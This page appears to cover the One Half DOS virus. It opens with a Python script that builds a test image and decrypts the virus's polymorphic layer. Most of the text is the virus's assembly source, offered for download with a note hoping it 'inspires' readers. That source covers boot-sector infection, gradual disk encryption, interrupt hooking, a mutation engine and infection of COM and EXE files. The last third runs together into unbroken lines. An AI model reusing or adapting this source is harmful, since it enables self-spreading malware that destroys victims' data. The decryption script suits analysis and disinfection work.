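    overlap by a byte, but each step XORs a fixed value, so running it again
    undoes it (encrypt == decrypt)."""
    for p in range(start, end):
        struct.pack_into("<H", buf, p, struct.unpack_from("<H", buf, p)[0] ^ key)
        key = (key + delta) & 0xFFFF


def build_sample(payload: bytes, key: int = 0x1234, delta: int = 0x4567) -> tuple[bytearray, int]:
    """Constructed host image (not a real infected file): payload encrypted at
    0x80, the ten template instructions (di = address, dx = data register)
    scattered with junk and jumps between them.  Returns (image, entry)."""
    start, end = 0x80, 0x80 + len(payload)
    img = bytearray(0x200)
    img[start:end] = payload
    xor_rolling(img, start, end, key, delta)
    pieces = [b"\x50", b"\x0e", b"\x1f",                     # push ax; push cs; pop ds
              b"\xbf" + struct.pack("<H", start),            # mov di,start
              b"\xba" + struct.pack("<H", key),              # mov dx,key
              b"\x31\x15",                                   # xor [di],dx
              b"\x81\xc2" + struct.pack("<H", delta),        # add dx,delta
              b"\x47",                                       # inc di
              b"\x81\xff" + struct.pack("<H", end),          # cmp di,end
              b"\x75"]                                       # jne <xor>; rel8 filled below
    slots = [0x100, 0x1E0, 0x110, 0x120, 0x1C0, 0x150, 0x140, 0x170, 0x173, 0x190]
    junk = [b"\x90\xf9", b"\x2e\xfc", b"\xf8\x3e", b"\xfd\xf5", b"\xfb\x90"]
    for i, (off, piece) in enumerate(zip(slots, pieces)):
        img[off:off + len(piece)] = piece
        pos = off + len(piece)
        if i == 9:                                           # close the loop on the xor
            img[pos] = struct.pack("<b", slots[5] - (off + 2))[0]
            break
        img[pos:pos + 2] = junk[i % len(junk)]
        pos += 2
        if slots[i + 1] == pos:                              # adjacent piece: no jump emitted
            continue
        rel = slots[i + 1] - (pos + 2)
        if -128 <= rel <= 127:
            img[pos:pos + 2] = b"\xeb" + struct.pack("<b", rel)
        else:
            img[pos:pos + 3] = b"\xe9" + struct.pack("<h", slots[i + 1] - (pos + 3))
    return img, slots[0]


def decode_image(img: bytearray, entry: int) -> dict:
    """Trace, extract the loop parameters, decrypt in place, return the parameters."""
    p = loop_params(trace_decryptor(img, entry))
    xor_rolling(img, p["start"], p["end"], p["key"], p["delta"])
    return p
```

Two details worth checking on real samples: two template instructions that the mutation placed back to back get no jump at all (the tracer handles that because it simply continues to the next opcode), and the rolling XOR uses word writes that overlap by one byte, so the byte just past `end` is touched as well and must lie inside the region you restore.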

When one half of the disk is encrypted, the virus, depending on the system date and generation, prints the following message to the screen:

Dis is one half.
Press any key to continue...

The body also contains the string "Did you leave the room ?", related to the Explosion virus by the same author.

Download here


ONE_HALF.ASM

; Dear friends,
; some time has already passed since the great days of the One Half epidemic.
; Nevertheless we still hope that the code of this popular virus inspires
; you also now. A lot of stuff has been written on the subject, so I think,
; not many words are necessary about this little creature any more.
; And, so, here is the original source of One_Half.3577:

DOSSEG
.MODEL SMALL
.STACK 100h

Vkod SEGMENT 'kod'
ASSUME CS:Vkod, DS:Vkod

stvir LABEL near
POCKIL=4                                ;virus length in kB

        DB 05ah
owner   DW ?
        DW POCKIL*1024/16-1
        DB 00h, 00h, 00h, 'COMMAND', 00h        ;MCB header

DLZVIR=(OFFSET endvir-OFFSET stvir)     ;virus length
POCSEC=((DLZVIR-1)/512+1)               ;number of sectors needed
POCINS=10                               ;number of instructions
DLZINS=10                               ;instruction length
DLZBUFF=512                             ;buffer length
DLZZAS=81h                              ;stack length
VRCHOL=(OFFSET endvir+DLZBUFF+DLZZAS)   ;top
POCTRACK=2                              ;track number
DLZFNB=64                               ;file name max. length

strc STRUC
id      DW ?
lpage   DW ?
pages   DW ?
items   DW ?
parps   DW ?
min     DW ?
max     DW ?
vSS     DW ?
vSP     DW ?
flag    DB ?
        DB ?                            ;check DW ?
vIP     DW ?
vCS     DW ?
iaddr   DW ?
strc ENDS

bheader strc <>
poss    DW POCINS DUP(?)
posss   DW ?                            ;positions of instructions
orprg   DB POCINS*DLZINS DUP(?)

v16     DW 16
v30     DW 30
v512    DW 512

;************ MBOOT ************
sboot:  xor bx, bx
        cli
        mov sp, 7c00h
        mov ss, bx
        sti


        mov ds, bx
        sub word ptr ds:0413h, POCKIL
        mov cl, 6
        int 12h
        shl ax, cl
        mov dx, 0080h
        mov es, ax
sector: mov cx, 0009h
        mov ax, (0200h+POCSEC)
        push es
        int 13h
bootid: mov ax, OFFSET staboot
        push ax
        retf
eboot LABEL near
;******************************
staboot:
        mov ds:(4*21h+2), cs
        mov ax, ds:046ch
        push ds
        push cs
        pop ds
        mov rnd1, ax                    ;RNG init
        mov ax, cs
        inc ax
        mov owner, ax                   ;MCB owner setting
        mov byte ptr ds:(OFFSET con3+1), 00h    ;condition for memory
        call Koppr                      ;copying of needed routines
        pop es
        mov bx, sp
        push es
        mov si, es:(bx+OFFSET eboot-OFFSET sboot)
zactr:  cmp si, 500                     ;everything encoded ?
        jbe uznk
        push si
        sub si, POCTRACK
        mov word ptr ds:(OFFSET cdft+2), si     ;last track
        pop si
        mov ah, 08h
        int 13h
        jc uznk
        mov al, cl
        and al, 3fh                     ;al = number of sectors
        mov kolzak, al                  ;number of sectors to encode
        mov cl, 01h
        mov bh, 7eh
        mov odkzak, bx                  ;start to encode from
        mov dl, 80h
nttrc:  dec si
        call Fromsi
        push dx
nthd:   mov ah, 02h
        push ax
        int 13h
        pop ax
        jc perwd
        call Skramb
        inc ah
        push ax
        int 13h
        pop ax
perwd:  jc erwd
        test dh, 3fh
        jz tcid
        dec dh
        jmp nthd
tcid:   pop dx
cdft:   cmp si, 100h                    ;last track
        ja nttrc
jfcor:  mov bh, 7ch
        mov es:(bx+OFFSET eboot-OFFSET sboot), si
        mov ax, 0301h
        mov cx, 0001h
        mov dh, ch
        int 13h
uznk:   mov word ptr ds:(OFFSET cnflte+2), si   ;for condition in res13
aktcd:  sub si, 613
        ja estne
        cmp si, -(3*POCTRACK-1)
        jb estne                        ;write it out 3x
        call Prejav
estne:  mov ax, 0201h
        mov bx, 7c00h
        mov cx, word ptr ds:(OFFSET sector+1)
        dec cx
        mov dx, 0080h
        int 13h                         ;read original boot
        cli
        les ax, es:(4*13h)
        mov word ptr oriv13, ax
        mov word ptr oriv13+2, es
        pop es
        push es
        les ax, es:(4*1ch)
        mov word ptr oriv1c, ax
        mov word ptr oriv1c+2, es
        pop es
        push es
        mov word ptr es:(4*13h), OFFSET res13
        mov es:(4*13h+2), cs
        mov word ptr es:(4*1ch), OFFSET res1c
        mov es:(4*1ch+2), cs            ;hook 13h and timer 1ch
        sti
        push bx
        retf

erwd:   xor ah, ah                      ;decode last track if error
        push ax
        int 13h
        pop ax
enthd:  inc dh
        mov ah, dh
        pop dx
        push dx
        cmp ah, dh
        ja ercor
        mov dh, ah
        mov ah, 02h
        push ax
        int 13h
        pop ax
        call Skramb
        inc ah
        push ax
        int 13h
        pop ax
        jmp enthd
ercor:  pop dx
        inc si
        jmp jfcor

res1c:  push ax
        push ds
        push es
        xor ax, ax
        mov ds, ax
        les ax, ds:(4*21h)
        mov word ptr cs:oriv21, ax
        mov ax, es
        cmp ax, 0800h
        ja chnp
        mov word ptr cs:(oriv21+2), ax
        les ax, cs:oriv1c
        mov ds:(4*1ch), ax
        mov ds:(4*1ch+2), es            ;unhook 1ch
        mov ds:(4*21h), OFFSET res21
        mov ds:(4*21h+2), cs            ;hook 21h
chnp:   pop es
        pop ds
        pop ax
        DB 0eah                         ;jump to original 1ch
oriv1c  DD ?

Koppr PROC near
        mov si, OFFSET zZakoduj
        mov di, OFFSET Zakoduj
        mov cx, OFFSET kzZak-OFFSET zZakoduj
        cld
        rep movsb                       ;copy needed routines
        ret
Koppr ENDP

Fromsi PROC near
        push ax
        mov ax, si
        mov ch, al
        push cx
        mov cl, 4
        shl ah, cl
        pop cx
        mov al, 3fh
        and dh, al
        and cl, al
        not al
        push ax
        and ah, al
        or dh, ah
        pop ax
        shl ah, 1
        shl ah, 1
        and ah, al
        or cl, ah
        pop ax
        ret
Fromsi ENDP

mess1   DB 'Dis is one half.', 0dh, 0ah, 'Press any key to continue ...', 0dh, 0ah
ems1    LABEL byte

Prejav PROC near
        test order, 11b                 ;only generations that are multiple of 4
        jnz somewhere_in_town
        mov cx, OFFSET ems1-OFFSET mess1
        mov si, OFFSET mess1
        mov ah, 0fh
        int 10h
        mov bl, 07h
        mov ah, 0eh
freddey_lives:
        lodsb
        int 10h
        loop freddey_lives
        xor ah, ah
        int 16h
somewhere_in_town:
        ret
Prejav ENDP

;**************** file part **************
Pmip PROC near
        push bx
        DB 0bbh
handle1 DW ?                            ;mov bx,handle1
        int 21h
        pop bx
        ret
Pmip ENDP

tInt13 PROC near
        pushf
        cli
        DB 09ah
toriv13 DD ?
        ret
tInt13 ENDP

res01:  push bp
        mov bp, sp
con2:   jmp short r1cn
r1cn:   cmp word ptr [bp+04h], 1234h
        ja nsyet
        push ax
        push bx
        push ds
        lds ax, [bp+02h]
        DB 0bbh
rlit    DW ?                            ;mov bx,rlit
        mov word ptr cs:[bx+OFFSET toriv13], ax
        mov word ptr cs:[bx+OFFSET toriv13+2], ds
        mov byte ptr cs:[bx+OFFSET con2+1], OFFSET syet-OFFSET r1cn     ;set condition
        pop ds
        pop bx
        pop ax
syet:   and byte ptr [bp+07h], 0feh
nsyet:  pop bp
        iret
;**************** installation to memory ****************

instm:  pop bx
        pop ax
        push ax                         ;ax = PSP
        dec ax
        mov ds, ax
        cmp byte ptr ds:[00h], 'Z'
        jne inchb
        add ax, ds:[03h]
        sub ax, (POCKIL*1024)/16-1      ;ax = virus segment
        mov dx, cs
        mov si, bx
        dec si
        mov cl, 4
        shr si, cl
        inc si                          ;si = paragraph count till beginning
        add dx, si
        add dx, cs:[bx+OFFSET bheader.min]      ;min memory request
        cmp ax, dx
        jb inchb                        ;not enough room in memory
        mov dx, ss
        mov si, sp
        add si, 3
        shr si, cl
        inc si
        add dx, si
        cmp ax, dx
        jb inchb
        mov byte ptr ds:[00h], 'M'
        sub word ptr ds:[03h], (POCKIL*1024)/16
        mov ds:[12h], ax
        mov es, ax
        push cs
        pop ds
        inc ax
        mov word ptr [bx+OFFSET owner], ax
        mov byte ptr [bx+OFFSET vsetky], 0ebh   ;infect everywhere
        mov si, bx
        xor di, di
        mov cx, DLZVIR
        rep movsb
        push es
        pop ds
        call Koppr                      ;copy needed routines
        xor ax, ax
        mov ds, ax
        cli
        mov ax, ds:(4*21h)
        mov word ptr es:oriv21, ax
        mov ax, ds:(4*21h+2)
        mov word ptr es:(oriv21+2), ax
        mov word ptr ds:(4*21h), OFFSET res21
        mov ds:(4*21h+2), es
        sti
inchb:  jmp aalldn

start LABEL near
stsub:  call next
next:   pop si
        sub si, OFFSET next
        mov [si+OFFSET rlit], si        ;relocation in trace

        push es
        push si
        cld
        inc word ptr [si+OFFSET order]  ;generation
        mov byte ptr [si+OFFSET vsetky], 74h    ;dis is jz ...
        xor ax, ax
        mov es, ax
        mov ax, es:046ch
        mov [si+OFFSET rnd1], ax        ;init RNG
        mov [si+OFFSET zls1+3], ax      ;key for HD encoding
        mov ax, 4b53h
        int 21h
        cmp ax, 454bh
        je palldn
        mov ah, 52h
        int 21h
        mov ax, es:[bx-02h]
        mov word ptr ds:[si+OFFSET r1cn+3], ax  ;limit
        mov byte ptr ds:[si+OFFSET con2+1], 00h ;set condition
        mov ax, 3501h
        int 21h
        push bx
        push es
        mov ax, 3513h
        int 21h
        mov word ptr [si+OFFSET toriv13], bx
        mov word ptr [si+OFFSET toriv13+2], es
        mov ax, 2501h
        lea dx, [si+OFFSET res01]
        int 21h
        lea bx, [si+OFFSET endvir]
        mov cx, 0001h
        mov dx, 0080h
        push cs
        pop es
        pushf
        pop ax
        or ah, 01h
        push ax
        popf
        mov ax, 0201h
        call tInt13
        pushf
        pop ax
        and ah, 0feh
        push ax
        popf
        pop ds
        pop dx
        pushf
        mov ax, 2501h
        int 21h
        popf
        jc pinstm
        push cs
        pop ds
        cmp word ptr [bx+(OFFSET bootid-OFFSET sboot)+1], OFFSET staboot
        jne ov444
palldn: jmp alldn

ov444:  cmp word ptr [bx+180h], 072eh
        je pinstm                       ;MASTER mboot protection
        mov ah, 08h
        mov dl, 80h
        call tInt13
        jc pinstm
        and cx, 00111111b               ;CL = max. sector number
        mov byte ptr ds:(si+OFFSET znxtsc+2), cl        ;for res13
        mov [si+OFFSET mxskt], cl
        and dh, 3fh
        mov [si+OFFSET mxhlv], dh       ;max. head number for encoding
        mov ax, 0301h
        sub cl, POCSEC
        mov byte ptr ds:(si+OFFSET zr13ds+2), cl        ;for condition in int13
        mov dx, 0080h
        call tInt13                     ;save original mboot
        jc pinstm
        push cx
        push dx
        push si
        xchg di, si
        mov cx, 4
        add bx, 1eeh
hlvp:   mov al, [bx+04h]
        cmp al, 01h
        je ptrif
        cmp al, 04h
        jb chdnn
        cmp al, 06h
        jbe ptrif
chdnn:  sub bx, 10h
        loop hlvp
        pop si
        pop dx
        pop cx
pinstm: jmp instm
ptrif:  mov cx, [bx+02h]
        mov dh, [bx+01h]
        call zTosi
        add si, POCTRACK+5
        mov [di+OFFSET zactr+2], si     ;cylinder nearer to the beginning
        xchg ax, si
        mov cx, [bx+06h]
        mov dh, [bx+01h]
        call zTosi
        mov [di+OFFSET kontr+2], si
        mov [di+OFFSET stpdb+1], si     ;cylinder nearer to the end
        add ax, si
        shr ax, 1
        mov [di+OFFSET aktcd+2], ax     ;cylinder to activate
        pop si
        pop dx
        pop cx
        mov ax, (0300h+POCSEC)
        xchg bx, si
        inc cx
        mov word ptr ds:[bx+OFFSET sector+1], cx
        call tInt13
        jc pinstm
        lea si, [bx+OFFSET sboot]
        lea di, [bx+OFFSET endvir]
        push di
        mov cx, OFFSET eboot-OFFSET sboot
        rep movsb
stpdb:  mov ax, 1234h
        stosw
        mov ax, 0301h
        pop bx
        mov cx, 0001h
        call tInt13
        jc pinstm

alldn:  pop bx
aalldn: push cs
        pop ds
        push cs
        pop es
        lea si, [bx+OFFSET orprg]
        add bx, OFFSET poss
        mov cx, POCINS
ssno:   mov di, [bx]
        push cx
        mov cx, DLZINS
        rep movsb
        pop cx
        inc bx
        inc bx
        loop ssno                       ;restore code
        pop es
        add bx, ((OFFSET bheader-OFFSET poss)-POCINS*2)
        mov di, es
        add di, 10h
        add [bx].vCS, di
        add [bx].vSS, di
        cmp [bx].items, 0
        je ssr4
        mov ds, es:[2ch]
        xor si, si
lfn:    inc si
        cmp word ptr [si], 0000h
        jne lfn
        add si, 4
        xchg dx, si
        mov ax, 3d00h
        int 21h
        jc errlp
        push cs
        pop ds
        mov [bx+(OFFSET handle1-OFFSET bheader)], ax
        mov dx, [bx].iaddr
        mov ax, 4200h
        call Pmip
        push es
        xchg ax, di
ssr3:   push ax
        lea dx, [bx+(OFFSET rbuff-OFFSET bheader)]
        mov cx, [bx].items
        cmp cx, ((OFFSET endvir-OFFSET rbuff)+DLZBUFF)/4
        jb ssr1
        mov cx, ((OFFSET endvir-OFFSET rbuff)+DLZBUFF)/4
ssr1:   sub [bx].items, cx
        push cx
        shl cx, 1
        shl cx, 1
        mov ah, 3fh
        call Pmip
        jc errlp
        pop cx
        pop ax
        xchg si, dx
ssr2:   add [si+2], ax
        les di, [si]
        add es:[di], ax
        add si, 4
        loop ssr2
        cmp [bx].items, 0
        ja ssr3                         ;relocation
        pop es
        mov ah, 3eh
        call Pmip
ssr4:   push es
        pop ds
        cmp cs:[bx].flag, 0             ;is it COM ?
        jne sEXE
        mov si, bx
        mov di, 100h
        mov cx, 3
        rep movsb
        pop ax
        jmp short sCOM
sEXE:   pop ax
        cli
        mov sp, cs:[bx].vSP
        mov ss, cs:[bx].vSS
        sti
sCOM:   jmp dword ptr cs:[bx].vIP
errlp:  mov ah, 4ch                     ;if error on program loading
        int 21h

rbuff LABEL byte
Rnd PROC NEAR
        mov word ptr cs:(OFFSET povsi+1), si
        push ax
        push bx
        push cx
        push dx
        DB 0b9h
rnd2    DW 0000h                        ;mov cx,rnd2
        DB 0bbh
rnd1    DW ?                            ;mov bx,rnd1  <-
        MOV DX, 015Ah
        MOV AX, 4E35h
        XCHG AX, SI
        XCHG AX, DX
        TEST AX, AX
        JZ r1
        MUL BX
r1:     JCXZ r2
        XCHG AX, CX
        MUL SI
        ADD AX, CX
r2:     XCHG AX, SI
        MUL BX
        ADD DX, SI
        INC AX
        ADC DX, 0000h
        MOV cs:rnd1, AX
        MOV cs:rnd2, DX
        MOV ax, dx
        pop cx
        xor dx, dx
        jcxz rdbz                       ;division by zero
        div cx
rdbz:   pop cx
        pop bx
        pop ax
        pop si
        push si
        cmp byte ptr cs:[si], 0cch      ;int 3 at the return address -> debugger
        cli
neksl:  je neksl
        sti
povsi:  mov si, 1234h
        RET
Rnd ENDP

;*************** mutation ****************
kod:    DB 1
kodpax: push ax
        DB 1
kodpcs: push cs
        DB 1
kodpds: pop ds
        DB 3
kodmsi: mov si, 1100h
        DB 3
kodmbx: mov bx, 1234h
        DB 2
kodxor LABEL near
k01:    xor [si], bx
        DB 4
kodabx: add bx, 4567h
        DB 1
kodisi: inc si
        DB 4
kodcsi: cmp si, 1103h
        DB 2
        jne k01

POCRI=9
randi:  nop
        stc
        clc
        sti
        DB 2eh                          ;cs:
        DB 3eh                          ;ds:
        cld
        std
        cmc

Rndi PROC near
        or dx, dx
        jz rintd
        push si
        push cx
        push dx
        mov cx, dx
rinxt:  mov si, OFFSET randi
        mov dx, POCRI
        call Rnd
        add si, dx
        movsb
        loop rinxt
        pop dx
        pop cx
        pop si
rintd:  ret
Rndi ENDP

Mtog PROC near
        mov ax, dx
        inc dx                          ;for all ins. could be before instruction
        call Rnd
        sub ax, dx
        call Rndi
        xchg dx, ax                     ;random ins. before instruction
        rep movsb                       ;instruction
        cmp bx, OFFSET poss+2*9         ;jump ?
        jne mtnj
        mov ax, poss[2*5]
        sub ax, di
        add ax, OFFSET ibuf
        sub ax, [bx]                    ;ax=poss[2*5]-di+OFFSET ibuf-[bx]
        dec di
        stosb                           ;jump to marked instruction
mtnj:   call Rndi                       ;random ins. after instruction
        ret
Mtog ENDP

kodd    DW OFFSET kodmbx
        DW OFFSET kodxor+1
        DW OFFSET kodabx+1              ;offset of instruction

kodi    DW OFFSET kodmsi
        DW OFFSET kodxor+1
        DW OFFSET kodisi
        DW OFFSET kodcsi+1

Kodins PROC near
kinxt:  lodsw
        xchg di, ax
        mov al, dl
        cmp si, OFFSET kodi+2*2
        jnz kint                        ;conversion when addressing
        and al, 101b
        cmp al, 001b
        jnz kins
        mov al, 111b
kint:   cmp si, OFFSET kodd+2*2
        jnz kins                        ;3 bit shift
        mov cl, 3
        shl al, cl
        or [di], al
        or al, 0c7h
        jmp short kiad
kins:   or [di], al
        or al, 0f8h
kiad:   and [di], al
        cmp si, OFFSET kodi
        jz kiend
        cmp si, OFFSET Kodins
        jz kiend
        jmp kinxt
kiend:  ret
Kodins ENDP

MHeader PROC near
fics:   mov si, OFFSET kodd
kom:    mov dx, 1000b
        call Rnd
        cmp dl, 100b                    ;SP
        je kom
        mov bl, dl
        call Kodins                     ;encoding of data registers
        mov si, OFFSET kodi
kbxa:   mov dx, 3
        call Rnd
        add dl, 110b
        cmp dl, 08h
        jne kvf
        mov dl, 011b                    ;BX
kvf:    cmp dl, bl
        je kbxa
        call Kodins                     ;encoding of address registers
        xor cx, cx
        mov di, OFFSET poss
pnxt1:  cmp cx, 9                       ;jump ?
        jne pnl
pom:    mov dx, 200
        call Rnd
        sub dx, 100
        add dx, poss[2*5]               ;return to 5. instruction
        cmp dx, 0
        jl pom
        cmp dx, DLZHDR
        jge pom
        jmp short pl
pnl:    DB 0bah
DLZHDR  DW 1000                         ;mov dx,DLZHDR
        call Rnd
pl:     jcxz pfirst
        mov si, OFFSET poss
        push cx
pnxt:   lodsw
        sub ax, dx
        cmp ax, DLZINS
        jge pOK
        cmp ax, -DLZINS
        jle pOK
        pop cx
        jmp pnxt1
pOK:    loop pnxt
        pop cx
pfirst: xchg ax, dx
        stosw
        inc cx
        cmp cx, POCINS
        jb pnxt1
;*******************************
        mov bx, OFFSET poss
        mov si, OFFSET kod
mnxt:   mov di, OFFSET ibuf
        lodsb
        mov cl, al
        mov dx, DLZINS-3+1              ;'cos range is 0 - (DLZINS-1)
        sub dx, cx
        mov ax, [bx+2]                  ;if one just after another - no jump
        sub ax, [bx]
        cmp ax, DLZINS
        jne mjin
        inc dx
        inc dx
        call Mtog
        inc bx
        inc bx
        jmp short mshort
mjin:   call Rnd
        call Mtog
        mov dx, di
        sub dx, OFFSET ibuf-3
        add dx, [bx]
        mov al, 0e9h
        stosb
        inc bx
        inc bx
        mov ax, [bx]
        sub ax, dx
        cmp ax, 126
        jg mnear
        cmp ax, -129
        jl mnear
        inc ax
        mov byte ptr [di-1], 0ebh
        stosb                           ;put short if possible
        jmp short mshort
mnear:  stosw
mshort: push bx
        push cx
        DB 0b9h
vysr    DW ?                            ;mov cx,vysr
        DB 0bah
nizr    DW ?                            ;mov dx,nizr
        add dx, [bx-2]
        adc cx, 0                       ;CX:DX = position for instruction
        push cx
        push dx
        call PozZac
        mov cx, DLZINS
        DB 0bah
vpior   DW ?                            ;mov dx,vpior
        add vpior, cx
        call Citanie
        pop dx
        pop cx
        jc mhpp
        call PozZac
        xchg cx, di
        mov dx, OFFSET ibuf
        sub cx, dx
        call Zapis                      ;put generated instruction into file
mhpp:   pop cx
        pop bx
        jc mhkon
        cmp bx, OFFSET poss+2*POCINS
        jnb mhkon
        jmp mnxt
mhkon:  ret
MHeader ENDP
;********************* end of m. ****************
;*************** copied routines **************
zZakoduj PROC near
        mov cx, DLZVIR
        xor dx, dx                      ;OFFSET stvir
        call zzp1
        mov ah, 40h
        mov bx, handle
        pushf
        DB 9ah
        DD ?                            ;call ds:oriv21
        jc zzk1
        cmp ax, cx
zzk1:   pushf
        call zzp1
        popf
        ret
zzp1:   push cx
        mov si, dx
zzkmax: mov ax, 0000h
        mov cx, DLZVIR
zzp2:   xor [si], ax
zzkaax: add ax, 0000h
        inc si
        loop zzp2
        pop cx
        ret
zZakoduj ENDP

zres24: mov al, 03h
        iret

zInt13 PROC near
        pushf
        call cs:oriv13
        ret
zInt13 ENDP

zTosi PROC near
        push cx
        push dx
        shr cl, 1
        shr cl, 1
        and dh, 11000000b
        or dh, cl
        mov cl, 4
        shr dh, cl
        mov dl, ch
        xchg si, dx
        pop dx
        pop cx
        ret
zTosi ENDP

zSkramb PROC near
        push ax
        push bx
        push cx
        DB 0b0h, ?                      ;mov al,?
        DB 0bbh, ?, ?                   ;mov bx,?
znxtss: mov cx, 256
zls1:   xor word ptr es:[bx], 1212h
        inc bx
        inc bx
        loop zls1
        dec al
        jnz znxtss
        pop cx
        pop bx
        pop ax
        ret
zSkramb ENDP

zres13: cmp ah, 02h
        je zrtc
        cmp ah, 03h
        je zrtc
        jmp zjtoo

zrtc : cmp dx , 0080hjne zencodetest cx , 0ffc0hjnz zencodepush bxpush dxpush sipush dipush cxpush cxmov si , axand si , 00ffhmov di , simov al , 01hpush axjz zbzch ;if AL=0 do nothingjcxz zgchicmp cl , 01hje zobbs

znxtsc : cmp cl , 17 ;if sector number > max. then errorja zgchi

zr13ds : cmp cl , 07hjb zctoocmp ah, 03hje zgchipush bx


mov cx , 512zflbf : mov byte ptr es :[ bx ], 00h

inc bxloop zflbfpop bx

zrtcom : add bx , 512pop axpop cxinc cxpush cxpush axdec sijnz znxtsc

zbzch : clczzav : pop ax

pushfxchg ax , disub ax , sipopfmov ah, chpop cxpop cxpop dipop sipop dxpop bxretf 2

zobbs : mov cl ,byte ptr cs :( OFFSET r13ds +2)zctoo : call zInt13

mov ch , ahjc zzavjmp zrtcom

zgchi : stcmov ch , 0bbh ;undefined errorjmp zzav

zencode : cmp dl , 80h ;encoding resp. decodingjne zjtoopush axpush cxpush dxpush sipush dspush cspop dsmov byte ptr kolzak , 0mov odkzak , bxcall zTosiand cl , 3fhand dh, 3fh

zchdnd : or al , aljz zhtvo

kontr : cmp si , 1234h ;max. cyl.jae zhtvocmp si , 1234h ;min. cyl.jb ztdalinc kolzakjmp short znxslp

ztdal : add odkzak , 512znxslp : dec al

inc clDB 80h , 0f9h


mxskt DB ? ;cmp cl,?jbe zchdndmov cl , 1inc dhDB 80h , 0feh

mxhlv DB ? ;cmp dh,?jbe zchdndxor dh, dhinc sijmp zchdnd

zhtvo : cmp kolzak , 0pop dspop sipop dxpop cxpop axje zjtoocmp ah, 02hje zeckncall zSkramb

zeckn : call zInt13pushfcall zSkrambpopfretf 2

zjtoo : DB 0eah;zoriv13 DD ?kzZak LABEL near;********************* EXE,COM modification ******* ****Subor PROC nearZapis : mov ah, 40h

jmp short s1Citanie : mov ah, 3fhs1 : call s2

jc s3cmp ax , cx

s3 : retZaciatok : xor cx , cx

mov dx , cxPozZac : mov ax , 4200h

jmp short s2Koniec : xor cx , cx

mov dx , cxPozKon: mov ax , 4202hs2 LABEL nearMhandle : mov bx , cs : handleInt21 : pushf

clicall cs : oriv21ret

Subor ENDP

Infikuj PROC nearmov bp, sp

mov ax , 5700hcall Mhandlemov bx , OFFSET ftimemov [ bx ], cxmov [ bx +2], dx ;read time and date of last writecall Identifyjc mikon0


mov dx , 30call Rnd ;with prob. 1:30 file won't be markedor dx , dxjz neoznmov [ bx ], ax ;mark

neozn : mov vpior , OFFSET orprg ;position in saving areamov dx , 0ffffhpush dxcall Rndmov word ptr ds :( OFFSET kodmbx+1), dxmov word ptr ds :( OFFSET zkmax+1), dxpop dxcall Rndmov word ptr ds :( OFFSET kodabx +2), dxmov word ptr ds :( OFFSET zkaax +1), dx ;values for encoding

call Zaciatokmov cx , 1ahmov dx , OFFSET headerpush dxcall Citaniejc mikon1xchg si , dxmov di , OFFSET bheaderrep movsbcall Koniecmov si , axmov di , dxpop bxcmp [ bx ] .id , 'MZ'je iEXEcmp [ bx ] .id , 'ZM'je iEXE

mov bheader.flag , 0 ;0 means COMcmp ax , 65535 -( DLZVIR+( VRCHOL- OFFSET endvir ))- 1 ;much too long dlhy ?cmcjc mikon1mov ax , 3 ;do not overwrite leading jumpcwdpush bxjmp short iCOM

iEXE : mov bheader.flag , 1mov ax ,[ bx ] .pagesmul v512sub ax , sisbb dx , di

mikon0 : jc mikon1 ;not wholemov ax ,[ bx ] .parpsmul v16push bxpush axpush dx

iCOM: sub si , axsbb di , dx

MINM=1000MAXM=3000

or di , dijnz short igt64mov dx , sisub dx , MINM


mikon1 : jb mikon2 ;not enough spacecmp dx ,( MAXM- MINM)jbe iltm

igt64 : mov dx ,( MAXM- MINM)iltm : call Rnd

add dx , MINMmov word ptr ds :( OFFSET kodmsi +1), dxadd dx , VRCHOL- 10h ;SS = CS+1cmp bheader.flag , 0je iCOM5mov header.vSP , dx ;set stack pointer

iCOM5: add dx , DLZVIR-(( VRCHOL- OFFSET stvir )- 10h )mov word ptr ds :( OFFSET kodcsi +2), dx ;header limitsadd dx , OFFSET stsub - DLZVIRmov posss , dx ;set jump after decodingadd dx ,(- DLZINS+1)-( OFFSET stsub - OFFSET stvir ) ;DX=Rnd+MINM-DLZINS+1mov DLZHDR, dxadd dx , DLZINS- 2not dxmov cx ,- 1call PozKon ;setting to the virus beginning in filemov vysr , dxmov nizr , axcmp bheader.flag , 0jne iEXE2xchg ax , dxadd dx , 100hjmp short iCOM1 ;if COM take from beginning

iEXE2 : pop dipop sisub ax , sisbb dx , di ;relatively in filediv v16

iCOM1: add word ptr ds :( OFFSET kodmsi +1), dxadd word ptr ds :( OFFSET kodcsi +2), dx ;set header limitspush axpush dxcall MHeader ;create header for decodingjnc twnm

mikon2 : jmp ikontwnm: pop dx

pop axmov cx , POCINSmov si , OFFSET poss

il1 : add [ si ], dxinc siinc siloop il1 ;set positions in posssub nizr , dxsbb vysr , 0 ;for correct positions on errorpop bxcmp bheader.flag , 0jne iEXE3

mov byte ptr [ bx ], 0e9hmov ax , poss [ 0* 2]sub ax , 3+100hmov word ptr [ bx +1], ax ;ins. jmp at the beginningmov bheader.items , 0mov bheader.min , 0mov bheader.vCS ,- 10hmov bheader.vIP , 100hjmp short iegh2


iEXE3 : mov [ bx ] .vCS , axinc axmov [ bx ] .vSS , axmov ax , poss [ 0* 2]mov [ bx ] .vIP , axadd [ bx ] .vSP , dx ;set SPand byte ptr [ bx ] .vSP , 0feh ;SP is evenmov [ bx ] .items , 0 ;no relocationsmov ax ,(( VRCHOL- OFFSET endvir )- 1)/ 16+1cmp [ bx ] .min , axjae iegh1mov [ bx ] .min , ax

iegh1 : cmp [ bx ] .max , axjae iegh2mov [ bx ] .max , ax ;set up min. and max. memory requirments

iegh2 : push bxcall Konieccall Zakoduj ;put v. to the file endjc ifailcall Koniecdiv v512inc axpop bxcmp bheader.flag , 0je iCOM4

iEXE1 : mov [ bx ] .pages , axmov [ bx ] .lpage , dx

iCOM4: push bxcall Zaciatokmov cx , 1ahpop dxcall Zapisjc ifail

stbkon : mov ax , 5701hmov cx , ftimemov dx , fdatecall Mhandle ;restore time and date

ikon : mov sp , bpret

ifail : mov dx , OFFSET orprgmov si , OFFSET poss

opdl : push dxlodswxchg dx , axmov cx , vysradd dx , nizradc cx , 0call PozZacpop dxmov cx , DLZINScall Zapisadd dx , cxcmp si , OFFSET posssjb opdl ;restore overwritten partsand ftime , 0ffe0h ;not markedjmp stbkon

Infikuj ENDP;************** routines for TSR part ****Nastav24 PROC near


push dxpush dspush cspop dsmov ax , 3524hcall Int21mov seg24 , esmov off24 , bxmov ax , 2524hmov dx , OFFSET res24call Int21pop dspop dxret

Nastav24 ENDPVrat24 PROC near

mov ax , 2524hlds dx ,dword ptr cs : off24call Int21ret

Vrat24 ENDP

